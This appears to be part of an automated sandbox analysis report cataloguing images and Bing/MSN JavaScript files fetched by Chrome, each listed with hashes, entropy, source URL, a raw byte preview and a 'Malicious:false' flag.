                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1274
                                                                                                                                                                                                                                                                        Entropy (8bit):4.76866515748201
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7ZA0RnsK88Dl3r5JCyJ3/M+yEoi1iwQfk/zOkKJFwmvAGaMIDgA3e66u/:sRsKtpr5JFJPMy3n/WrwxGazDgA3H
                                                                                                                                                                                                                                                                        MD5:BC2CA4C02D8330860D34A943488A7A45
                                                                                                                                                                                                                                                                        SHA1:EEB8859DE80E94571F7E906BDFAAFA9C98E493B7
                                                                                                                                                                                                                                                                        SHA-256:5CD4E73D22042B54B0648341D22DCE5E089F6ADAAD76FE70083CD545D36CD9C4
                                                                                                                                                                                                                                                                        SHA-512:335D1C0EEDC3235770F81CF37EF36649474B9A23E4D924EDD681A6BD8674A3A89E48B77AA788ED3ABEB6881884832D9F066B76486609CDE303EE3D61F7FA6FEC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....?IDATx..SMK.Q.~4.......Z..B.i..@.....q.O. ...~..B..V...>tSY..@C.E0(.U!.w.x_.....9sf.y.9.....o.s.........F..Z....+.L&,..b}}.[[[.S..]..`0.`{{....L....t:\..ex<........D....p.....7.d.YT*......i...".L"......d...(kkk....coo.....%xxx.^.G".@8.F..'.....<o0..@...L.........{~~..)...Uptt.@&..,J.Au.J%..,k......r.......f......u:....>??...D...YM&.:EI...f.\..h...%vvvH...H I...x||....cV.....A(....lb<..v8..I...P............6+......1Q..!.......V.%.r9^..*O.`IV.,..oE#.C...v..n.K.y@.j./.........\i..V.....kD.Q6M.'}..FZ....qrr...U.U..'.|>...X,.3..|...%D"..R)...h`..g.#.^y.2.C...%.."j.}....IEND.B`............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 414 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2144
                                                                                                                                                                                                                                                                        Entropy (8bit):7.603445614854898
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Wt2dMFbpombbd4x5k01228Qzim0XOgJbxQuvyCoQjm:Ldc1omvd4x5k0V8uH0+gZxQ8yCocm
                                                                                                                                                                                                                                                                        MD5:67E0BE8B32F82EBAA6F07A2383C25F13
                                                                                                                                                                                                                                                                        SHA1:D5B4BAE8B70AC9D6E3C3AC673546957CCB719618
                                                                                                                                                                                                                                                                        SHA-256:4CC6C20061A8027BF45B02982830F5760BC6F65D0A0DE75094BC90245C287548
                                                                                                                                                                                                                                                                        SHA-512:54C558D486C71882E11B11DE566738949E97BEF3EC12050213FEE48BE033E981C32B7C64F2057D74D232FEB778A959C52781759BF48938F4F6B4BD0E88F68ACC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR....... .........../PLTE..............................................................................................................................fff.....................................................................................................................................................................................ctRNS.0.@..`.... ...Pp...U......}J%.._*..3.........IWo..K..H..,.......mCA.|..`......]............e.#?....}IDATx^.ws.8...&D.`......\..\z..\........#i.%.......WD.0..a.X@....3.c..vH....P.t..-.n..$..$4.%lJ>.EIM...*..<..o.I..(.k\DsQaFE....Q.....66.0#..7.@..I3...R*_..;......@=1......[;*...r...1..I.Z(..(.0p....&Q..00.h-...t.......|%..\".:.e0....K...`c.{o.X.... I..e..y@N.........B.6.J....&...P#.:...m...g.+.....>........<6G.`.;.$..$.6.!..__@..1.1...1G]..'.G.G..!..%<D.{...`....m.c+z......AE>.5.5..D."..(.;..1.[....,Z.<......c_.5..>...NS.|......l8.Z..c!=l..g......a'...W#....w......W..s.|y....&&*.. p.........K.rD.8.%p-I.[.v.Cg.G.g..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8484), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):8484
                                                                                                                                                                                                                                                                        Entropy (8bit):5.338819503207566
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:VViW1/Mi54qAXOQz7dPtm+Icrd+1J4Ecs:VViW1/MRNFcMd56
                                                                                                                                                                                                                                                                        MD5:768C025CADC4CBD980733F771FEBA772
                                                                                                                                                                                                                                                                        SHA1:376949EE88FCFABCCD50A1976BD1E6AC20EB0DDC
                                                                                                                                                                                                                                                                        SHA-256:BD014843A7D652B50956A5FAAA927F66F810C8D2086B53A487FE9B45BCDCA1B1
                                                                                                                                                                                                                                                                        SHA-512:5E78D3C6B1A2324459C4A8A9694FA0A267BBBE445B97A1AD73CE32B6673EBC735613307C0563115114662237A258F8FBFDEAFF9998F12BF4795FA8AA4FC82998
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/N2lJ7oj8-rzNUKGXa9HmrCDrDdw.js
                                                                                                                                                                                                                                                                        Preview:var bepns=bepns||function(n,t){function gt(){var n=this;sj_be(_w,"message",fi,!1);ni();sj_be(e,"click",y,!1);sj_evt.bind("AutoOpenFlyout",function(){w=!0;a||!a&&hi()>=1200?c(r,"b_hide")?ft(n.evt,!1):v=bt:v=kt;v&&LightLogger&&LightLogger.logInstrumentationV2(null,LightLogger.InstrumentationEventType.Init,wt,!0,{SuppressionReason:v})},!0);sj_evt.bind("AutoOpenFlyoutHide",function(){i&&o(null,!0,!1)},!0);sj_evt.bind(d,ui);sj_evt.bind("onP1",ri,1);sj_evt.bind("id:refreshed",ti,1);window.addEventListener("click",function(){s(f,"b_hide")});si()&&y(null)}var st="redDotControl",ht="rh_meter_leaf_homepage",ct="rh_meter_leaf",lt="givemuid_heart_homepage",at="GiveMuid",vt="GiveSerp",yt="hub_apps_698b01b4-557a-4a3b-9af7-a7e8138e8372",pt="SUCCESS",wt="AutoOpenFlyoutSuppression",bt="BepFlyoutMissingOrNotHidden",kt="InvalidPageWidth",dt=["bing.com","bing.com:443","bing-exp.com","bing-int.com","localhost","binginternal.com"],p=700,k=320,d="onPopTR",g="bepfo",w=!1,f,u,h,r,i,e=n("id_rh"),a=typeof _H!="u
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):18944
                                                                                                                                                                                                                                                                        Entropy (8bit):7.967445633426257
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e1hf75wMBpX/Rp7PWwFU5YBnBC129UDQpwys7MgM+v6a7inJJ8sowc:e3z5VpXpZ/U8BCgoQwXvjUJ8nwc
                                                                                                                                                                                                                                                                        MD5:508E8220AFAA5E75C6B4AF3926697CBF
                                                                                                                                                                                                                                                                        SHA1:A4449080D17596898B59331CBB032095850FE69A
                                                                                                                                                                                                                                                                        SHA-256:5037F7AF0741E73B2FA523B741A2BC2BE187C8D9E2BD9AD0A94143D1CCCAA3CB
                                                                                                                                                                                                                                                                        SHA-512:4F5596F84A88D2637068E41BA51281445BBE0D0505E87CCF63ED5BE6A46C6A2D3A8E9C0CA358B5BD095EE4BD5A8F25210F5AC9324D4C4A1808E527545A261367
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...m..i.g.}..V.xX`.*h.:b...8..C.rG.J..r?J..qNh.~T/.O.H.f........-WN...T.g..46l....0.A,H `z.H.....ViB...@..,G...L..x...4...f;....B^^.V...`...s.D...s...0ylb.I=LO...n....... A,.....cs......T....V...~..[Z.5..@.!IC.b2..:..."d9.GQ.^..!.I.k.v...c..../ .....W!.S.w....;.h...E..?..dz..N.0.....9.].{V...kz....w..m.ke.lgc.Ua.....y9.\.|A.x[...h.B..KG2.....r/.!.>.9R.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                                                        Entropy (8bit):4.769846064020748
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPahmtru/sucE9sSwYO8bzPFNaUmujt+yQJld:6v/7/dDYpRNa8Q
                                                                                                                                                                                                                                                                        MD5:88FDEBA867664DABC5C40ADAA9640B30
                                                                                                                                                                                                                                                                        SHA1:1BFCCA5AD54333779920CB675D9A814750EF26DF
                                                                                                                                                                                                                                                                        SHA-256:306A38F1F6BA51824D11C22B183A2D21120B66B50D3E2DFA60A2181A75DCAF09
                                                                                                                                                                                                                                                                        SHA-512:C4498290FB3811CC2122393B5D1E059991EDCD1BB76A40E07CFB69FDB07F5B0FC51C300F23B577857397F5EEF72E6CF0E2E76B08CF9EBD55BEC9A981685B8707
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA18UlKH.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx.cY........+....ZY.X)5.R...2R...6.]@...@,..cx..!C@h2.........vn]. $".......M...7.1....AAI....s.:z...U}.X........^...6.f...7...../.?b`ee..}a`bb`...e.....|....._.|`......K...2#....!a.p6....g...n.FF..P@R:`......H.."..C......=k...~....IEND.B`.................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6111), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6111
                                                                                                                                                                                                                                                                        Entropy (8bit):5.4559475301936695
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:TPNM3pWfaPzYdv/vsuZl8vweS7Advxa6NkIGvx02aZULGePYr+JuPcrMYrAA4N:ZM3pWC7YnB87S7AdJDkI602aZULGeYN
                                                                                                                                                                                                                                                                        MD5:F8C6D0A85334BD6DA4BC9B7F185F0755
                                                                                                                                                                                                                                                                        SHA1:DB600D69F470D17949F69E57468DFC429224BF28
                                                                                                                                                                                                                                                                        SHA-256:842532A1E1D67CA1EFDB72B123BFCE418DD286E2FEC749CBB1373E688378734C
                                                                                                                                                                                                                                                                        SHA-512:C0F3DB9557835C7B522818D18E9AE6C5538A5BD39959A5D97748C538913707AB63C0DB37389200AF17DDD3FF68A9259644736AA9F60520187746C3C6548986AB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/22ANafRw0XlJ9p5XRo38QpIkvyg.js
                                                                                                                                                                                                                                                                        Preview:var SAUpsellTrigger;(function(n){function f(n){var t=new RegExp("^https://(www.|cn.)?(bing.com|staging-bing-int.com)");return!n||!t.test(n)?!1:!0}function y(n){var t=new RegExp("^sapphirebing://");return!n||!t.test(n)?!1:!0}function p(n){var t=new RegExp("^[a-zA-Z0-9]{7,8}_[a-zA-Z0-9]{7,8}$"),i=new RegExp("^[a-zA-Z0-9]{7,8}$");return!n||!(t.test(n)||i.test(n))?!1:!0}function e(n,t,i,r){r===void 0&&(r="default");f(n)||(Log.Log("OpalUpsell_SAUpsellTriggers","InvalidFallbackLink","".concat(r,", ").concat(n)),n=l);y(t)||(Log.Log("OpalUpsell_SAUpsellTriggers","InvalidDeeplink","".concat(r,", ").concat(t)),t=a);p(i)||(Log.Log("OpalUpsell_SAUpsellTriggers","InvalidTracker","".concat(r,", ").concat(i)),i=v);var u="https://k5nc.adj.st/".concat(t.substring(15),"&adj_t=").concat(i,"&adjust_deep_link=").concat(encodeURIComponent(t),"&adj_redirect_ios=").concat(encodeURIComponent(n),"&adj_redirect_android=").concat(encodeURIComponent(n)),e=navigator.userAgent&&navigator.userAgent.toLocaleLowerCase(
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19008)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):316988
                                                                                                                                                                                                                                                                        Entropy (8bit):5.239088634343518
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vLKLj7yjWF276GNg9fpe3HdabIKSB1DkCXW8o0oMlppfbm:zgj7bSB1DkCXW8T5dbm
                                                                                                                                                                                                                                                                        MD5:8192D891E754AFD81A399F98BC6B265F
                                                                                                                                                                                                                                                                        SHA1:965E6C69F45118FEAB86EEEBBB0FC4964F2B3A98
                                                                                                                                                                                                                                                                        SHA-256:E2E4D97C20D4478E8E947480C8F6C71A2C795776D405366BE70DB82E4EA4BA77
                                                                                                                                                                                                                                                                        SHA-512:7C2712A1E34DA9062F50E7D93F4E74772044E45C265C682ABCD4E28E4004DCDAF6CE7479A4E8785986A88A32257E4FAC0ECF8CE23AFE47968C4510DF0A2C800B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/ll5safRRGP6rhu7ruw_Elk8rOpg.js
                                                                                                                                                                                                                                                                        Preview:/*! @azure/msal-browser v2.28.2 2022-09-06 */."use strict";!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).msal={})}(this,(function(e){./*! *****************************************************************************. Copyright (c) Microsoft Corporation... Permission to use, copy, modify, and/or distribute this software for any. purpose with or without fee is hereby granted... THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH. REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY. AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,. INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM. LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR. OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5146
                                                                                                                                                                                                                                                                        Entropy (8bit):7.92054723869336
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEoMqRxjovgeSOpNWSfGV6Qmju0QJykNG3zovmsioGSynLa3EGw7b:ygrMMjoYedpNdGV6Qdl3Jv5ioj8232/
                                                                                                                                                                                                                                                                        MD5:68DF420997E2171DB09B8B51A7166C17
                                                                                                                                                                                                                                                                        SHA1:5590419B8B319719D3A96FB3D8AA9E6B356BC5D3
                                                                                                                                                                                                                                                                        SHA-256:BA22C0CDE79E23E03D86C0494AB85AB987600412A50E2B6EE629602254148938
                                                                                                                                                                                                                                                                        SHA-512:315BD18CD4EC14BCD1D29DF501A3BA3000BE22D0D55B603401F16F519C8883E830512151568CF4D2D70F79EA2E1D0D9C1C8F1213286241C77FF4542BF8B9E3A9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<3.j....G"D....88.U@j.+g.....x.....w....#.?.....OE.rpz.XK<..p[...e....V.....)..Ky...w.......N.j.wn....*....z....d.rk:.R5.7.^]L..........)..}i.x..}qV!..y.?y..X(..ts....{v..?.U...8#.zV..,..F...1.....A.=.......s.!.......%..v..\..ys.....]q...TLq...j...<.v;.......[.......F.....J..,h...bI...m?@.F..oq..q+........l/....5_.V.........T.1..6.....=[<...z......l.B
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1041
                                                                                                                                                                                                                                                                        Entropy (8bit):4.2484633897908495
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:tnq3ripj6Gnhrf9MiYjaM/Wxv1qUJHGjrIO3KAFz:VEipjbZf3YjGr4N3x
                                                                                                                                                                                                                                                                        MD5:407303FF19FBE8081F2BEAC9CF1AD7B9
                                                                                                                                                                                                                                                                        SHA1:CCFDFD943C6DAD51EA5E9804F15A3E3EBC8BA642
                                                                                                                                                                                                                                                                        SHA-256:2DF3CB601B3DE31BFC06AA7626183B7BF7F3624025BDA11C766D4CF0335B89B1
                                                                                                                                                                                                                                                                        SHA-512:BB2C515E75E0334D66BFC7765CED6654A074309A38B353DD8142D4D34C9D2F43DDD3C7D4336A65F3208D7BA38353C05793BBE0AE67EEC1803532F6D744B3E04A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg enable-background="new 0 0 40 40" viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg"><path d="m20 0c-11.046 0-20 8.954-20 20s8.954 20 20 20 20-8.954 20-20-8.954-20-20-20zm13.082 33.082c-3.351 3.349-7.971 5.418-13.082 5.418s-9.731-2.069-13.081-5.418c-3.349-3.351-5.419-7.971-5.419-13.082s2.07-9.731 5.419-13.081c3.35-3.349 7.97-5.419 13.081-5.419s9.731 2.07 13.082 5.419c3.349 3.35 5.418 7.97 5.418 13.081s-2.069 9.731-5.418 13.082zm-13.082-13.078c2.761 0 5-2.239 5-5s-2.239-5-5-5-5 2.239-5 5 2.239 5 5 5zm0-8.5c1.933 0 3.5 1.567 3.5 3.5s-1.567 3.5-3.5 3.5-3.5-1.567-3.5-3.5 1.567-3.5 3.5-3.5zm5.754 10.496h-11.501c-1.242 0-2.249 1.007-2.249 2.249v.578c0 .893.318 1.756.898 2.435 1.566 1.834 3.952 2.739 7.098 2.739 3.145 0 5.533-.905 7.102-2.738.581-.679.901-1.544.901-2.439v-.575c0-1.243-1.007-2.249-2.249-2.249zm.749 2.824c0 .536-.192 1.056-.541 1.463-1.257 1.468-3.224 2.214-5.962 2.214s-4.704-.746-5.958-2.213c-.348-.407-.539-.926-.539-1.461v-.578c0-.414.335-.749.749-.749h11.502c.414 0
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):35714
                                                                                                                                                                                                                                                                        Entropy (8bit):7.962594488900293
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:e9D1ptrOrtPx20J/UVlwr4wGVg3+/9AAlO8t0bNvH/sg:e9xwtPFBVr+W+/ySj0hvHd
                                                                                                                                                                                                                                                                        MD5:8D41C5A4C46DDE9D8B890D2C89CACA75
                                                                                                                                                                                                                                                                        SHA1:A3AF821C8B24164DE51A8714137B7FBF4D698519
                                                                                                                                                                                                                                                                        SHA-256:6370F2380DD0B7018DD5BD7A15459DD6440935E6F56E5DDD95E98803883E7824
                                                                                                                                                                                                                                                                        SHA-512:67E7EDFF8DDCA2B3A28FD64A533D24046F14E97CEA5FDEFA4FB997C20257D2EA43E4CCBA5184EDF3B536E6D160327E4C02C239CB56BEA32B6752E44D704BD40C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....F....ss..%.q;.I.7(\q..'.{.....G.t......U+.mfp..M.1....#.....9..~..Wz..!.....8P;d..../..I....n..n..@..V.....0.?..y..mW.(*{.Yn[F.$.-../..>.}gwl...mu.I...P\&...N.p..N.Gz......4..._.t...h...|.Yd..dE..|..$q.....t...ho....k$.kw^cwh..d....?.|..i.m.m.(.hd.d..9.9.^.<eJ5{.m8.3.;..o..........Cik#...9Sl..Rv}.pOR:..hF.....j...*.........0...........3.....L...^.....
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (22247)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):40067
                                                                                                                                                                                                                                                                        Entropy (8bit):5.648100276481272
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:IfCCQv85MN7CZV3HSn1ZF+buhYs1HH4wexSkMF034DL:IS8Q+ZV3HS1ZUbuhYslsg/
                                                                                                                                                                                                                                                                        MD5:0F391E1575A46344DD5320FA23EABAEA
                                                                                                                                                                                                                                                                        SHA1:EAEEADBFE86D2DCBA7081AB8E714D31B3E22C782
                                                                                                                                                                                                                                                                        SHA-256:45AA765909D61EFE0872B1D12853F8CF05899804ED79D625411A9C0255D7B1F3
                                                                                                                                                                                                                                                                        SHA-512:2B536385059BF2471EB57337B0E775B885FE01E6B90842D292C37A557F943A0E10795FCA4936A6EAD1EEE486B3CBA4F89F0115CA08F043AA1B29158A93ABABB8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/web-components_fast-msft-web-components_dist_dom-policy_sanitize-inner-html-policy_js-web-com-10ee55.a06841ac60c8d66785b2.js
                                                                                                                                                                                                                                                                        Preview:/*! For license information please see web-components_fast-msft-web-components_dist_dom-policy_sanitize-inner-html-policy_js-web-com-10ee55.a06841ac60c8d66785b2.js.LICENSE.txt */.(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["web-components_fast-msft-web-components_dist_dom-policy_sanitize-inner-html-policy_js-web-com-10ee55"],{83245:function(e){e.exports=function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,n){return t=Object.setPrototypeOf||function(e,t){return e.__proto__=t,e},t(e,n)}function n(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],(function(){}))),!0}catc
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1228), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1228
                                                                                                                                                                                                                                                                        Entropy (8bit):5.021257455081656
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:6Vj1V5FrGj6BBE2eyo6maDU6CWi4dDRRE0Slc7qHy5++vY:8v5TBiF6U6C+DLSiL+P
                                                                                                                                                                                                                                                                        MD5:04E46D18C015E7C22CB2E4B43DCEFD05
                                                                                                                                                                                                                                                                        SHA1:212F9F2089A5F85033160582DCCB1B41A7E4CD15
                                                                                                                                                                                                                                                                        SHA-256:A8172A1CD35702E0679AA2FC817640738B09D8C2A1BACF4A132E68D314407744
                                                                                                                                                                                                                                                                        SHA-512:E3FD5F578CD864C0B1905C3342C3539CC98D78DE8A4734EB2629558ECA566F464890425250610DE11CB9950C481DDB5C3ABF6557E189D7153461F43FE62D34AD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var Feedback;(function(n){var t;(function(){"use strict";function u(t,i){var u=t.getAttribute("id"),f;u||(u="genId"+n.length,t.setAttribute("id",u));f=new r(u,i,t.getAttribute(i));n.push(f)}function i(n,t,i){i===null?n.removeAttribute(t):n.setAttribute(t,i)}function t(n,t,r,f){for(var e,s=_d.querySelectorAll(r),o=0;o<s.length;o++)(e=s[o],f&&e.id&&f[e.id])||(u(e,n),i(e,n,t))}function f(n){for(var u=_d.querySelectorAll(n),e=1,f={},t,i,r=0;r<u.length;++r){if(t=u[r],!t.id){for(;;)if(i="fbpgdgelem".concat(e++),!_ge(i))break;t.id=i}f[t.id]=t}return f}function e(){var i="tabindex",r="-1",n=f("#fbpgdg, #fbpgdg *");t(i,r,"div",n);t(i,r,"svg",n);t(i,r,"a",n);t(i,r,"li",n);t(i,r,"input",n);t(i,r,"select",n);t("aria-hidden","true","body :not(script):not(style)",n)}function o(){for(var r,t=0;t<n.length;t++)r=_d.getElementById(n[t].id),r&&i(r,n[t].attributeName,n[t].originalAttributeValue);n.length=0}function s(){typeof sj_evt!="undefined"&&(sj_evt.bind("onFeedbackStarting",function(){e()}),sj_evt.b
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1101
                                                                                                                                                                                                                                                                        Entropy (8bit):4.829151166001716
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t0S8eLfl954T0u2y3EO1gRcDrIvQaDxijjfscC:vLfRWtPDuQKIjq
                                                                                                                                                                                                                                                                        MD5:91CD11CFCCA65CFACE96153268D71F63
                                                                                                                                                                                                                                                                        SHA1:E0BE107728D3BF41D8136220DA897D798A2AC60F
                                                                                                                                                                                                                                                                        SHA-256:8EE1E6D7A487C38412D7B375AC4A6BD7E47F70858055EEB7957226ADA05544BE
                                                                                                                                                                                                                                                                        SHA-512:4367CE147C7FA4590838F23C47819B8954858128336979E28BA116924B92660A7CBDC9A8292C45C5F26FF591F423F03DFADCB78A772DBE86AC5FBABF0B4E7711
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" width="24px" height="24px" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <rect fill-opacity="0.2" fill="#000" x="0" y="0" width="24" height="24" rx="2"></rect>.. <g transform="translate(4, 4)">.. <path d="M13.2916881,1.29304814 L7.99395739,6.59077883 L2.69622669,1.29304814 C2.30349711,0.913737214 1.67923378,0.919161894 1.29315522,1.30524045 C0.907076669,1.691319 0.90165199,2.31558234 1.28096291,2.70831192 L6.57869361,8.00604261 L1.28096291,13.3037733 C0.90165199,13.6965029 0.907076669,14.3207662 1.29315522,14.7068448 C1.67923378,15.0929233 2.30349711,15.098348 2.69622669,14.7190371 L7.99395739,9.42130639 L13.2916881,14.7190371 C13.6844177,15.098348 14.308681,15.0929233 14.6947596,14.7068448 C15.0808381,14.3207662 15.0862628,13.6965029 14.7069519,13.3037733 L9.40922117,8.00604261 L14.7069519,2.70831192 C15.0976827,2.31746305 15.0976827,1.683897 14.7069519,1.29304814 C14.316103,0.902317288 13
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
